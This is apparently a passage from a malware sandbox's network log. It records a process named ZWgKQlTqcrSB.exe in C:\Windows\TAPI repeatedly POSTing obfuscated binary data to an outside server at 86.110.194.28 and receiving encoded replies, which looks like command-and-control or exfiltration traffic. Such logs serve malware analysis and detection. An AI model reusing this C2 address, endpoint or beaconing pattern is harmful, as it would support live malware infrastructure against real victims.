                                                                                                                                                                        Jan 3, 2025 07:58:57.730564117 CET | 2516 | OUT | Data Raw: 5b 5d 5e 59 5d 5a 55 5b 54 5b 59 5a 5b 55 57 5d 5f 55 5a 58 52 5d 50 48 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: []^Y]ZU[T[YZ[UW]_UZXR]PHZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%(--_!\8W2<@=)0)X%<5!!8,3: 00T()#Y'$X.)
                                                                                                                                                                        Jan 3, 2025 07:58:58.101722956 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:58.240165949 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:57 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                        85 | 192.168.2.4 | 50092 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                        Jan 3, 2025 07:58:58.384593964 CET | 304 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Jan 3, 2025 07:58:58.730741978 CET | 2516 | OUT | Data Raw: 5b 54 5b 5b 58 5f 50 5f 54 5b 59 5a 5b 50 57 5d 5f 53 5a 58 52 54 50 44 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [T[[X_P_T[YZ[PW]_SZXRTPDZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%+=!\"+1?/=.Z'4[%!W 3'_ C$,3?9#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:58:59.066411018 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:59.198621988 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:58 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                        86 | 192.168.2.4 | 50093 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                        Jan 3, 2025 07:58:59.326107979 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:59.683701038 CET | 2516 | OUT | Data Raw: 5e 57 5e 5f 58 5f 55 5d 54 5b 59 5a 5b 5e 57 5e 5f 5d 5a 54 52 51 50 43 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^W^_X_U]T[YZ[^W^_]ZTRQPCZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&(-=" 2?(+*_06%?=V5. +(X0)$B0<8()#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:59:00.009135962 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:59:00.138685942 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:59 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                        87 | 192.168.2.4 | 50094 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                        Jan 3, 2025 07:59:00.268465042 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:59:00.621206045 CET | 2516 | OUT | Data Raw: 5b 56 5e 50 5d 5a 50 50 54 5b 59 5a 5b 55 57 5b 5f 54 5a 55 52 55 50 49 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [V^P]ZPPT[YZ[UW[_TZURUPIZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%(.^5:2+)]6^3'5]1?* $Q ;+094'S+#Y'$X.)
                                                                                                                                                                        Jan 3, 2025 07:59:00.958904982 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:59:01.086683989 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:59:00 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                        88 | 192.168.2.4 | 50095 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                        Jan 3, 2025 07:59:01.244991064 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2512
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:59:01.590245962 CET | 2512 | OUT | Data Raw: 5b 5c 5b 5c 58 57 50 5a 54 5b 59 5a 5b 57 57 59 5f 55 5a 5f 52 51 50 47 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [\[\XWPZT[YZ[WWY_UZ_RQPGZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%(-Z5:S1,>*Y3$5]2?)V6$=Q7 X'*73, V<9#Y'$X.)
                                                                                                                                                                        Jan 3, 2025 07:59:01.949121952 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:59:02.080518961 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:59:01 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                        89 | 192.168.2.4 | 50096 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                        Jan 3, 2025 07:59:02.320359945 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:59:02.668078899 CET | 2516 | OUT | Data Raw: 5e 50 5b 5b 58 5c 50 5d 54 5b 59 5a 5b 50 57 5b 5f 55 5a 5b 52 51 50 46 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^P[[X\P]T[YZ[PW[_UZ[RQPFZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&C)>=\!* &<#=;39X2,!6':!(7$?0'<9#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:59:02.977601051 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                        90 | 192.168.2.4 | 50097 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                        Jan 3, 2025 07:59:03.096436977 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2108
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:59:03.449481964 CET | 2108 | OUT | Data Raw: 5b 5d 5b 5c 58 5b 50 51 54 5b 59 5a 5b 52 57 52 5f 53 5a 5f 52 51 50 46 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [][\X[PQT[YZ[RWR_SZ_RQPFZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%?>_"*32<=+*_'B9Y%/P!$%!+0[3$A3$(9#Y'$X.5
                                                                                                                                                                        Jan 3, 2025 07:59:03.785831928 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:59:03.914947987 CET | 380 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:59:03 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Content-Length: 152
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 0d 1d 24 5d 32 15 07 00 3d 2f 2c 00 31 33 0f 12 22 09 3b 05 38 09 36 41 21 3f 3e 00 25 2b 2b 0e 2b 13 36 41 28 0a 39 51 21 2e 31 57 29 30 28 5d 03 10 39 10 3f 3d 28 04 29 2d 31 59 39 24 23 14 27 0e 38 11 2b 33 25 1e 27 3c 03 0d 35 2e 2f 52 2a 0d 22 03 33 2b 3c 5d 28 0e 2b 13 24 07 20 54 0b 17 24 0d 30 30 24 06 31 16 0b 58 2a 0e 27 05 33 29 39 50 21 02 04 50 22 39 0e 5d 38 23 3d 55 30 06 36 0d 29 58 2c 0c 32 3a 0b 00 30 01 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                        Data Ascii: $]2=/,13";86A!?>%+++6A(9Q!.1W)0(]9?=()-1Y9$#'8+3%'<5./R*"3+<](+$ T$00$1X*'3)9P!P"9]8#=U06)X,2:0.\#(U4WP


                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                        91 | 192.168.2.4 | 50098 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                        Jan 3, 2025 07:59:03.219265938 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:59:03.574350119 CET | 2516 | OUT | Data Raw: 5b 5c 5b 5c 58 5f 55 5f 54 5b 59 5a 5b 50 57 5e 5f 54 5a 5a 52 53 50 43 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [\[\X_U_T[YZ[PW^_TZZRSPCZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&A)>"#*;%<>]"%'%Y%66'!V (39<0Y8V+)#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:59:03.905606031 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:59:04.034710884 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:59:03 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                        92 | 192.168.2.4 | 50099 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                        Jan 3, 2025 07:59:04.156013966 CET | 304 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Jan 3, 2025 07:59:04.511946917 CET | 2516 | OUT | Data Raw: 5e 57 5e 5b 58 58 50 59 54 5b 59 5a 5b 53 57 5a 5f 55 5a 55 52 55 50 40 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^W^[XXPYT[YZ[SWZ_UZURUP@ZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&B+=5]"<R&/3((-3B>&/=S". (+$,'?+?#Y'$X.1
                                                                                                                                                                        Jan 3, 2025 07:59:04.833029985 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:59:04.962728024 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:59:04 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
93 | 192.168.2.4 | 50100 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:59:05.097970009 CET | 304 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2504
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Jan 3, 2025 07:59:05.449337959 CET2504OUTData Raw: 5b 55 5e 51 5d 5c 50 5d 54 5b 59 5a 5b 57 57 5b 5f 51 5a 5e 52 52 50 43 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [U^Q]\P]T[YZ[WW[_QZ^RRPCZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%)>6 S&Z#)(!3'>2*6'"!(30;$$W+#Y'$X.5
Jan 3, 2025 07:59:05.794365883 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:59:05.926873922 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:59:05 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
94 | 192.168.2.4 | 50101 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:59:06.071065903 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:59:06.418168068 CET2516OUTData Raw: 5b 51 5e 5d 5d 59 55 58 54 5b 59 5a 5b 53 57 5f 5f 5c 5a 5c 52 57 50 45 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [Q^]]YUXT[YZ[SW__\Z\RWPEZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&?=>!)0T%,,)+$B:&<=S"$7;+' @0<#?9#Y'$X.1
Jan 3, 2025 07:59:06.766067028 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:59:06.895543098 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:59:06 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
95 | 192.168.2.4 | 50102 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:59:07.044748068 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:59:07.402508974 CET2516OUTData Raw: 5e 51 5b 5f 58 5d 50 5f 54 5b 59 5a 5b 54 57 5c 5f 55 5a 5a 52 54 50 44 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^Q[_X]P_T[YZ[TW\_UZZRTPDZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&E(>#9?%,D((._09X1?"!>##%9(B0(W+#Y'$X.-
Jan 3, 2025 07:59:07.733371019 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:59:07.862514019 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:59:07 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
96 | 192.168.2.4 | 50103 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:59:08.020550966 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
